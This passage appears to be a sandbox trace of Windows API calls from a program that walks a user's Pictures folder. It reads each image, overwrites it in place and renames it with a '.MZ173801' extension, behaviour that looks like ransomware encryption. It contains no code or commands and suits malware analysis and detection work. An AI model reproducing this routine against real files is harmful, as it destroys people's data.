lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.421] GetCurrentThreadId () returned 0x1358 [0113.421] GetCurrentThreadId () returned 0x1358 [0113.421] GetCurrentThreadId () returned 0x1358 [0113.421] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\-116L1WcvYJmv_lb Zj-.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\-116l1wcvyjmv_lb zj-.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.421] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.421] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.421] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x15a20 [0113.421] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.422] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x15a20, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x15a20, lpOverlapped=0x0) returned 1 [0113.423] CloseHandle (hObject=0x3f8) returned 1 [0113.425] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\-116L1WcvYJmv_lb Zj-.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\-116l1wcvyjmv_lb zj-.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.426] WriteFile (in: hFile=0x3f8, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x15a20, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0x15a20, lpOverlapped=0x0) returned 1 [0113.429] CloseHandle (hObject=0x3f8) returned 1 [0113.431] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\-116L1WcvYJmv_lb Zj-.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\-116l1wcvyjmv_lb zj-.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\-116L1WcvYJmv_lb Zj-.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\-116l1wcvyjmv_lb zj-.bmp.mz173801")) returned 1 [0113.432] GetCurrentThreadId () returned 0x1358 [0113.432] GetCurrentThreadId () returned 0x1358 [0113.432] GetCurrentThreadId () returned 0x1358 [0113.432] GetCurrentThreadId () returned 0x1358 [0113.432] GetCurrentThreadId () returned 0x1358 [0113.432] GetCurrentThreadId () returned 0x1358 [0113.432] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bba07a0, ftCreationTime.dwHighDateTime=0x1d5e4f3, ftLastAccessTime.dwLowDateTime=0x7dd84450, ftLastAccessTime.dwHighDateTime=0x1d5e96d, ftLastWriteTime.dwLowDateTime=0x7dd84450, ftLastWriteTime.dwHighDateTime=0x1d5e96d, nFileSizeHigh=0x0, nFileSizeLow=0xe6b1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="2n q.bmp", cAlternateFileName="2NQ~1.BMP")) returned 1 [0113.432] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.432] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.432] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\2n q.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\2n q.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bba07a0, ftCreationTime.dwHighDateTime=0x1d5e4f3, ftLastAccessTime.dwLowDateTime=0x7dd84450, ftLastAccessTime.dwHighDateTime=0x1d5e96d, ftLastWriteTime.dwLowDateTime=0x7dd84450, ftLastWriteTime.dwHighDateTime=0x1d5e96d, nFileSizeHigh=0x0, nFileSizeLow=0xe6b1)) returned 1 [0113.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.433] GetCurrentThreadId () returned 0x1358 [0113.433] GetCurrentThreadId () returned 0x1358 [0113.433] GetCurrentThreadId () returned 0x1358 [0113.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.434] GetCurrentThreadId () returned 0x1358 [0113.434] GetCurrentThreadId () returned 0x1358 [0113.434] GetCurrentThreadId () returned 0x1358 [0113.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\2n q.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\2n q.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.434] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.434] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.434] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xe6b1 [0113.434] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.434] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xe6b1, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xe6b1, lpOverlapped=0x0) returned 1 [0113.435] CloseHandle (hObject=0x3f8) returned 1 [0113.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\2n q.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\2n q.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.437] WriteFile (in: hFile=0x3f8, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0xe6b1, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0xe6b1, lpOverlapped=0x0) returned 1 [0113.439] CloseHandle (hObject=0x3f8) returned 1 [0113.441] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\2n q.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\2n q.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\2n q.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\2n q.bmp.mz173801")) returned 1 [0113.442] GetCurrentThreadId () returned 0x1358 [0113.442] GetCurrentThreadId () returned 0x1358 [0113.442] GetCurrentThreadId () returned 0x1358 [0113.442] GetCurrentThreadId () returned 0x1358 [0113.442] GetCurrentThreadId () returned 0x1358 [0113.442] GetCurrentThreadId () returned 0x1358 [0113.442] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa91d9d10, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0xd8632cb0, ftLastAccessTime.dwHighDateTime=0x1d5e520, ftLastWriteTime.dwLowDateTime=0xd8632cb0, ftLastWriteTime.dwHighDateTime=0x1d5e520, nFileSizeHigh=0x0, nFileSizeLow=0x10561, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="7L1WKCQLeheP.jpg", cAlternateFileName="7L1WKC~1.JPG")) returned 1 [0113.442] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.442] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.442] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\7L1WKCQLeheP.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\7l1wkcqlehep.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa91d9d10, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0xd8632cb0, ftLastAccessTime.dwHighDateTime=0x1d5e520, ftLastWriteTime.dwLowDateTime=0xd8632cb0, ftLastWriteTime.dwHighDateTime=0x1d5e520, nFileSizeHigh=0x0, nFileSizeLow=0x10561)) returned 1 [0113.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQ